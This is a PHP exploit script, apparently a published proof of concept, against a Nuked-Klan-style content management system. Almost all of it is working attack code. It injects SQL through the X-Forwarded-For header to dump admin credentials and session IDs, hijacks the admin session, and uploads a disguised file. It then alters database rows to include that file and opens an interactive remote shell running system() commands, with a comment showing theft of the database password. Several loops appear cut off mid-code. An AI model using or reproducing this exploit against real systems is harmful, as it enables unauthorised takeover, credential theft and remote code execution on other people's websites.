# Website: http://www.acid-root.new.fr/ # PHP conditions: None =] # Private since 2 months. # error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class. require("phpsploitclass.php"); # If you want to use this class, the latest # version can be downloaded from acid-root.new.fr. $xpl = new phpsploit(); $url = 'http://localhost/nk/'; # url $prx = ''; # proxy : $pra = ''; # basic authentification $xpl->agent("Firefox"); $xpl->allowredirection(0); $xpl->cookiejar(0); if($prx) $xpl->proxy($prx); if($pra) $xpl->proxyauth($pra); $config = array(); $config[] = 'nuked'; # table prefix $config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = ''; $request = array(); $request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'"; $request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'"; $request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'"; $request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'"; for($i=0;$iaddheader("X-Forwarded-For",$sql); $xpl->get($url); $xpl->reset('header'); } if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches)) die("Exploit Failed"); $what = array("login","passwd","user_id","session"); for($i=0;$i ".$matches[2][$i]; if(empty($matches[2][3])) exit("\nNo session found"); # Logged in as admin $name = array("admin_session","user_id","sess_id"); $xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]); $phpc = array( frmdt_url => $url.'?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer',$url); $xpl->formdata($phpc); $xpl->get($url.'?file=User&op=edit_pref'); if(!preg_match('#\getcontent(),$match)) exit("\nNo file found"); else print "\n\$shell> "; $sql = array(); $sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;"; $sql[] = "DELETE FROM $config[0]_nbconnecte;"; for($i=0;$ipost($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url); $data = explode('123456789',$xpl->getcontent()); print $data[1]."\n\$shell> "; } function char($data) { $char='CHAR('; for($i=0;$i